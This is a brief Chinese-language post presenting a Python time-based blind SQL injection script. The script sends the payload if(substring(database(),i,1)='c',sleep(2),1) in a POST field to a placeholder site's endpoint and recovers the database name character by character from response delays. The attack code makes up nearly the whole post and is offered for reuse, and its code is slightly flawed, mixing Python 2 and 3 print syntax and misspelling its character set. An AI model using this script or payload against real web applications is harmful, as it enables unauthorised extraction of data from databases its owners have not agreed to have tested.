盲注脚本

随手写的，觉得太垃圾了不要打我

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import requests
import time
payloads = 'abcdefghigklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.'

user=''
print('Start to retrive current user:')
for i in range(1,23):
        for payload in payloads:
                startTime=time.time()
                headers ={'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'}
                url = """http://www.xxx.com/user/GetDocumentTypeList"""
                data = {'businessType':"""if(substring(database(),{0},1)='{1}',sleep(2),1)""".format(i,payload)}
                response=requests.post(url,headers=headers,data=data)
                if time.time() - startTime > 2:
                        user +=payload
                        print 'user is:', user
                        break
print('\n[Done] current user is {0}'.format(user))

效果